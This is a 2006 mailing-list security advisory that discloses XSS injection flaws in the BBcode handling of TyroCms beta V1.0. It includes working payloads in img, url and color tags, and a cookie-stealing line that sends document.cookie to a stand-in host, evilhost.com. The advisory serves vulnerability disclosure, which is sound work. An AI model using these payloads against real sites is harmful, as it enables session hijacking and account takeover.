lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 2 May 2006 14:33:23 -0000
From: zerogue@...il.com
To: bugtraq@...urityfocus.com
Subject: TyroCms beta V1.0 multiple XSS injections


TyroCms beta V1.0 multiple XSS injections

Discovered by: Nomenumbra
Date: 5/2/2006
impact:moderate (privilege escalation,possible defacement)

TyroCMS is a PHP & MySql powered content management system(cms).
Inludes built-in forums, powerful admin control panel, secure user system, and much more.
Easily manage the site throuh the admin panel even if you do not have great webmastering skills! 

Due to the way BBcode is interprented by TyroCms it is possible to inject javascript in several statements like:
In images:

[img]javascript:alert('xss')[/img]

or in urls:

[url=x" onmouseover="alert('xss')]Site Name[/url]

or in colors:

[color=red" onmouseover="alert('xss')]lol[/color]

See? We could inject javascript like this:

javascript:window.navigate('http://www.evilhost.com/cookiestealer.php?c='+document.cookie)

to steal cookies.

Nomenumbra/[0x4F4C]


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ